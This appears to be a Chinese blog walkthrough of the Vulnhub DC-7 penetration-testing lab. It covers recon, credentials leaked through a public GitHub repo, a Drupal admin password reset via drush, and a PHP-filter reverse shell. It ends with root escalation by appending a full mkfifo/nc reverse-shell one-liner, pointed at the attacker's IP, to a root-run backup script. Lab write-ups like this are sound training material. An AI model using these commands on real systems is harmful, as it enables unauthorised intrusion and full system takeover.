Vulnhub靶机:DC-7

标签信息泄露Drupal CMS反弹shelllinux提权

0x00 环境准备

下载地址:https://www.vulnhub.com/entry/dc-7,356/
flag数量:1
攻击机:kali
攻击机地址:192.168.1.31
靶机描述:

DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

While this isn't an overly technical challenge, it isn't exactly easy.

While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.

What you will need to do, is to think "outside" of the box.

Waaaaaay "outside" of the box. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

在靶机描述中,有个提示,就是Waaaaaay "outside" of the box. :-),这是一个信息泄露,虽然在实战中也会用到,不过这需要一点脑洞,当然更需要运气。

0x01 信息搜集

1.探测靶机地址

命令:arp-scan -l

靶机地址是192.168.1.35

2.探测靶机开放端口

命令:nmap -sV -p- 192.168.1.35

开放了22和80端口,先看一下80端口


是Drupal CMS。根据上面的靶机描述,大概意思是说不要尝试爆破,方式在盒子外面。看了一下表哥的文章,才发现突破点。(反正我是没有想到)

0x02 信息泄露

突破点:


放到搜索引擎搜一下


发现了一个GitHub账号,点进去看看有没有什么线索,地址:https://github.com/Dc7User/staffdb

config.php文件中发现了数据库的账号密码dc7user \ MdR3xOgB7#dW。但是刚才使用nmap扫描并没有看到数据库的端口,那就尝试登陆一下网站后台,失败;再试试SSH,成功了。

0x03 Drush修改admin密码

输入sudo -l,发现不能提权

ssh登陆后发现有新邮件,ls查看一下,发现两个文件

一个是backups,这个应该是备份目录,backups备份文件里有两个gpg文件,这是加密文件,没有密码本看不了;还有一个mbox文件,

mbox文件说明:
在linux下的邮件一般有两种形式,一种是mbox形式,一种是maildir形式,mbox是以一个txt文件的形式存储用户的邮件,而maildir是以一个目录的形式,目录下又分成tmp,cur,new三个目录,用户写邮件、发送邮件、接收邮件将使用不同的目录。

刚才登录的时候也提示有新邮件,那就看一下mbox吧


在最后新收到的邮件中发现备份文件的sh文件,看一下


backups.sh文件中主要发现了两个命令,一个是gpg,加密命令,这里可以看到加密方式,在前面看到的gpg文件可以解密了,不过我偷看了一下参考答案,发现解密文件没有太大的作用。还有一个命令是drush命令。

Drush是Drupal的命令行shell和Unix脚本接口。Drush Core附带了许多有用的命令,可用于与模块/主题/配置文件等代码进行交互。

Drush命令可以修改网站后台admin用户的密码,命令:drush user-password admin --password="123456"
需要注意的是,使用drush命令的时候要先切换到项目根目录,也就是网站源码所在的目录,不然会报错,网站目录一般在/var/www/html

修改成功了,去后台登录一下看看


成功登录后台。

0x04 反弹shell

既然可以登录后台,那就可以尝试写入一句话getshell。
Drupal 8不支持PHP代码,Drupal 8后为了安全,需要将php单独作为一个模块导入,插件地址:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
下面进行进行安装:

然后输入项目地址,点击安装


选择第二个选项


然后向下拉,找到FILTERS选项,勾选PHP Filter选项,点击安装


安装成功了


接下来在选择一个页面写入PHP一句话,我就在欢迎页面写了。
既然能写一句话那也能直接反弹shell呀,何必连菜刀再反弹shell呢。


在kali上监听4444端口,访问网站主页,发现已经连接上了

输入命令:python -c 'import pty;pty.spawn("/bin/bash")'

0x05 提权

刚才用到的/opt/scripts/backups.sh文件发现拥有者是root,而root在www-data组里,所以我们当前的身份可以对backups.sh文件进行读写执行操作。那么我们就用这个文件进行提权。
在backups.sh文件写入反弹shell代码:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.31 7777 >/tmp/f" >> backups.sh
注意把地址修改成kali的地址和端口。

backups.sh文件大约每15分钟运行一次,耐心等待反弹。可以刷会B站喝杯茶。(如果很久都没有反弹shell,那就查看一下上面命令中攻击机的地址和端口是否填写正确,别问我为什么提示这个。
反弹过来了

flag就在/root目录下


由于我不会每天都登录简书,所以有什么私信或者评论我都不能及时回复,如果想要联系我最好给我发邮件,邮箱:Z2djMjUxMTBAMTYzLmNvbQ==,如果发邮件请备注“简书”


参考链接

1.Vulnhub靶机实战——DC-7
2.Vulnhub_DC7 记录
3.mbox与maildir

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,142评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,298评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,068评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,081评论 1 291
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,099评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,071评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,990评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,832评论 0 273
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,274评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,488评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,649评论 1 347
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,378评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,979评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,625评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,796评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,643评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,545评论 2 352